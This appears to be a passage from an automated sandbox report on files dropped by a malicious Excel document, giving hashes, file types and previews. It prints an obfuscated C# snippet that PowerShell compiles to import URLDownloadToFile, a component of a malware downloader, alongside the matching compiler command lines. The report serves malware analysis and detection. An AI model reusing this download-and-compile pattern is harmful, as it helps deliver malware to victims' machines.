                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 3 13:01:09 2024, 1st section name ".debug$S"
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                  Entropy (8bit):3.9827563147538427
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:HQe9E2Ub/dHuwKdNWI+ycuZhNqHakSjQPNnqSqd:IZtKd41ulqHa3jIqSK
                                                                                                                                                                                  MD5:5B9471C2931FADEA3575C3B64F115D66
                                                                                                                                                                                  SHA1:92E49D1C0DD289E8AD9EB380E9DDDD1240FCED08
                                                                                                                                                                                  SHA-256:13FA9DAEA8DE018C4A4A599D8CF8B7E7A273F853488DD7A7BED459514DA9A1DC
                                                                                                                                                                                  SHA-512:A8F1BAF7EDEDAAD1A615B903A0D359235565F4E3D40EC3010332E1DE16140DEECFDD3B8791B5CE39D785664A5BB8D194CF26FE098B184CEE6F9DB20C13622519
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L.....Og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP..................0..'E.+.; ..........4.......C:\Users\user\AppData\Local\Temp\RESBBA2.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 3 13:01:23 2024, 1st section name ".debug$S"
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                  Entropy (8bit):3.972409640922591
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:H2e9EurCTedHxwKdNWI+ycuZhNnOakSOPPNnqSqd:zrcu6Kd41ulOa3qqSK
                                                                                                                                                                                  MD5:DC31E203A1FC0179907B250D72C74CFC
                                                                                                                                                                                  SHA1:FCD05AECFC52637FB159765240F0DB7C7BD08AFA
                                                                                                                                                                                  SHA-256:E0B97148B6F6F7FB2A572CCCA5B85D524C43F34837D463D5ADCAD7CC5672D1EC
                                                                                                                                                                                  SHA-512:802164D3DF9A81900922FB9EDC624E3379292AA77066F067057CD62269D43DE826873C6FC79BFBCFD2C1F359E1FB080914BFDB862B8AC7B56405FAB20504A0BE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L...#.Og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP................j.>.i....C'+.&...........4.......C:\Users\user\AppData\Local\Temp\RESF4EA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x028a0300, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1360490195156638
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:K91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:K9EXaLuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:F2226ED90194EE3B174DE8E1216EE492
                                                                                                                                                                                  SHA1:3AE19280053E5766EE6137E4CA0723066A35033E
                                                                                                                                                                                  SHA-256:F48297DDF8948B4C3992FB1E28A0D90F45AB4631BDEB73A882E2D73488C3A662
                                                                                                                                                                                  SHA-512:7800022169D7661119C23D20235298619091F8DBE41AC3CB237F30E7DC070B347542DF993BFB924B7E232D8F9A6C89FE8477A10941091A2815D61415C8269252
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..3....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                  Entropy (8bit):3.08388015659087
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQHak7YnqqjQPN5Dlq5J:+RI+ycuZhNqHakSjQPNnqX
                                                                                                                                                                                  MD5:879F0A30F8E382AE2745162BE4A23B20
                                                                                                                                                                                  SHA1:2537FB0FC0346F73F058F8DF9928C4B43134686A
                                                                                                                                                                                  SHA-256:43AD03072524B0855F2DF757F8495A1FD75D82EC9B4235D24B1538F89EF5C038
                                                                                                                                                                                  SHA-512:6F5DDBF2B90BED804A4FA744A601A8F321A9D4D8770DA2C8A5CB2B1E337BD8E550EA20123FCF89272EE6E98703626E4C954A689C7C3BFFEC07305477E79E287B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (367)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):488
                                                                                                                                                                                  Entropy (8bit):3.9754005389217877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuAi04tNkmMGlhbQXReKJ8SRHy4H/aQm4bV51j/As1W9y:V/DTLDfuAiJPt2XfHraQxp3Msk9y
                                                                                                                                                                                  MD5:3B52E3D1532B0BEB731C47FE5CF04437
                                                                                                                                                                                  SHA1:7135F88114807B36BE4B96E49E2ED21C1C2E48E1
                                                                                                                                                                                  SHA-256:D89D61099F569F77396FEFCDA11858CDC45FECC437AFA5204B654A63C0393AD8
                                                                                                                                                                                  SHA-512:D49EEB4817FD128B9C27930CC82388D17678684C56B9A92AA3F52154485CA0ED2E168849F9E7FC1815ADCA53B0AD57F525464087B4C3D9E14D02423D8939F8F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace KqzGjT.{. public class ZxzNKYoGJwP. {. [DllImport("urLMOn.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GjhMmMvqGKG,string lhSK,string CQBAeZT,uint ICEcRdeIUx,IntPtr pzxxzpmI);.. }..}.
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                  Entropy (8bit):5.196921063157367
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fg4XIB4Xqzxs7+AEszIP23fg4XIB4Xdx:p37Lvkmb6Kz4aGaqWZEo4aGadx
                                                                                                                                                                                  MD5:2FE3D95C4FD373A6555BAF1AAC53C5A8
                                                                                                                                                                                  SHA1:B12D0FDFC8C71067B2965CD287CF07ED83548E7C
                                                                                                                                                                                  SHA-256:345FBA994F0F18925F32EF285B6791517D974C72451BF487CD5C36DE402E9B2D
                                                                                                                                                                                  SHA-512:82188759F3F730366A27C5759DD46D40AD29D66E541629F9EC7C466976D272A91A9D9B13DFFFF14F29AE16BAED2C24EE382149712D7C2DEDF485AD72E3C02EC4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.0.cs"
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                  Entropy (8bit):2.8757328258497203
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:etGSypuYYNdl8sJlvukUof26h6jmOzR3tkZfizLtFWI+ycuZhNqHakSjQPNnq:65Y4+SlAoe6hVFJizLm1ulqHa3jIq
                                                                                                                                                                                  MD5:F3816D0F84E5ED16AB08BF36C2DEF007
                                                                                                                                                                                  SHA1:5A0120D82837CB168A0E51D828BBF8E60D17B3E2
                                                                                                                                                                                  SHA-256:876154F80D034A74D6C0110EAE69C84B0BA9E7FBF1037738845E7A9C698FE556
                                                                                                                                                                                  SHA-512:51BA7CADFBFBE66F3F34CDDBC37B8B4C997DBCAFC297DD084E892C198D9600487D80ED4D97D4A5392E7992301EE52DF713528401FBFC3CE1CD3CE0AFB0E33E70
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Og...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................:.3.......................................#.............. A.....P ......S.........Y.....e.....j.....r.....}...S.....S...!.S.....S.......!.....*.......A.......................................*..........<Module>.si
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                  Entropy (8bit):5.3100451742052694
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:AId3ka6Kzi8Eoi+UKaMD5DqBVKVrdFAMBJTH:Akka60NEo8KdDcVKdBJj
                                                                                                                                                                                  MD5:9C9C71479D9EABF82084275F20F065EE
                                                                                                                                                                                  SHA1:4351D4BF6A3EB4A97636F750D75FF5FE895DDC05
                                                                                                                                                                                  SHA-256:15D612F9C75D3815AB2339432CA849478ACB37FA8EB7D11630E68E5FACC41C34
                                                                                                                                                                                  SHA-512:FE83022058056A0A91066F5728DBA9F6855A21A20EA9B5977565AF9EBBF59226D5DEEFF79E6A098CF0823CD7F90E3D13CC233774D3DF795B6A7DC617B72CFE19
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                  Entropy (8bit):3.0674982000905775
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNOak7YnqqOPPN5Dlq5J:+RI+ycuZhNnOakSOPPNnqX
                                                                                                                                                                                  MD5:6AFB3EE969CA9EA09DB543272B1826C5
                                                                                                                                                                                  SHA1:ED60D2C0585EAB56F8C8B9AB0F6FE24EF3439F1B
                                                                                                                                                                                  SHA-256:CF718D5F27FC668E12D12092F9076BA5BE0C1680419E1DCA43B123E5898BE1A1
                                                                                                                                                                                  SHA-512:76E7BBAECAFAF07D038F1863BC7777ACF97F3D4ADBC10AAA5298437225885490DC486DA4ABB2F7E7ECD287D16A9543697F25BB9EC19D94EF68BE60843CB193AA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (367)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):488
                                                                                                                                                                                  Entropy (8bit):3.9754005389217877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuAi04tNkmMGlhbQXReKJ8SRHy4H/aQm4bV51j/As1W9y:V/DTLDfuAiJPt2XfHraQxp3Msk9y
                                                                                                                                                                                  MD5:3B52E3D1532B0BEB731C47FE5CF04437
                                                                                                                                                                                  SHA1:7135F88114807B36BE4B96E49E2ED21C1C2E48E1
                                                                                                                                                                                  SHA-256:D89D61099F569F77396FEFCDA11858CDC45FECC437AFA5204B654A63C0393AD8
                                                                                                                                                                                  SHA-512:D49EEB4817FD128B9C27930CC82388D17678684C56B9A92AA3F52154485CA0ED2E168849F9E7FC1815ADCA53B0AD57F525464087B4C3D9E14D02423D8939F8F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace KqzGjT.{. public class ZxzNKYoGJwP. {. [DllImport("urLMOn.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GjhMmMvqGKG,string lhSK,string CQBAeZT,uint ICEcRdeIUx,IntPtr pzxxzpmI);.. }..}.
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                  Entropy (8bit):5.158374416388388
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fHRGQGzxs7+AEszIP23fHRGQV9:p37Lvkmb6KzPgvWZEoPgA9
                                                                                                                                                                                  MD5:62CA38958475F2ED57C68F90EFE30FBB
                                                                                                                                                                                  SHA1:96DF0A4846E6BCC17F2AF829F83687096414506A
                                                                                                                                                                                  SHA-256:18A41695DE3057D20CDE2F951E3BB34D8C4484197E4799F750CB5A184B4E855B
                                                                                                                                                                                  SHA-512:6E727505F38A1640410261D8850DBCF6C085DA7CF930B44F9F053D249CA645AFFC8217F24154FAF21B5A0D44EBB227F8921941BA49BD3F73044EFEF0A204D63A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.0.cs"
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                  Entropy (8bit):2.865917331229087
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:etGSkpuYYNdl8sJlvukUof26h66wmOzR3tkZf/eh0LtFWI+ycuZhNnOakSOPPNnq:6LY4+SlAoe6hXFJ/E0Lm1ulOa3qq
                                                                                                                                                                                  MD5:18B23C34A39911FA732807D3673FC8BC
                                                                                                                                                                                  SHA1:21A57017F8985C24949759282A7DF165D3607418
                                                                                                                                                                                  SHA-256:9762F61E18080FE47610E2365D1103E509002B7B3160FCACBD86B29AE40112B4
                                                                                                                                                                                  SHA-512:5716D71659FCE6727AE4E7D3A581F01C7070E1F5FAAA1CA7B4A660A50F3C141A5DE3DAB61CF414547F4ED8A6601028539444ED611BC36A5B7DC35DBCEF77DC0F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.Og...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................:.3.......................................#.............. A.....P ......S.........Y.....e.....j.....r.....}...S.....S...!.S.....S.......!.....*.......A.......................................*..........<Module>.tc
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                  Entropy (8bit):5.300052825143811
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:AId3ka6Kz1Eo0KaMD5DqBVKVrdFAMBJTH:Akka601Eo0KdDcVKdBJj
                                                                                                                                                                                  MD5:441607F44CEB70BB3C61A9AA217B0C4B
                                                                                                                                                                                  SHA1:B3B286732690CA7AD37E350C481BE074930BE1A1
                                                                                                                                                                                  SHA-256:DC76FA8F3B635BCC9E442B06C685AE11B2FB24A2139DC3E36C7F8E92E6D430D3
                                                                                                                                                                                  SHA-512:EF7FBA3FCC9E69A1355F06FA27067C3E4F0F52EA4CE1C2B19FBB936E52F5A3F02126D4FBBF03139F6A1E5B37C879797EE6E718806778D55AFDBFA5929ADB40B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (3200), with CRLF line terminators
Category:dropped
Size (bytes):153968
Entropy (8bit):3.790314730405568
Encrypted:false
SSDEEP:3072:tx65fliEYTNokaahkpx65fliEYTNokaahvpx65fliEYTNokaah+:tAHGNAiCAHGNAiRAHGNAi+
MD5:23F2631CE99480A209B12A8F520D5480
SHA1:1F6CB113C9A2FF37CE5047B25EE7F432A4DBC950
SHA-256:4F1B501AD9C6CFEDAC6521C680F30D4FDBFDBD86C2742755D07F67C4939F0235
SHA-512:D906B932E7D6C8BD87D47E7D52E2CAF0AE05231E02BA720D8F81D9A90F5A2688773EC80CA91775B8753812FD638D2D123564489DA066A4C423DD76EB7F5CCAAE
Malicious:true
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 13:01:13 2024, Security: 1
Category:dropped
Size (bytes):988160
Entropy (8bit):7.7587349199950895
Encrypted:false
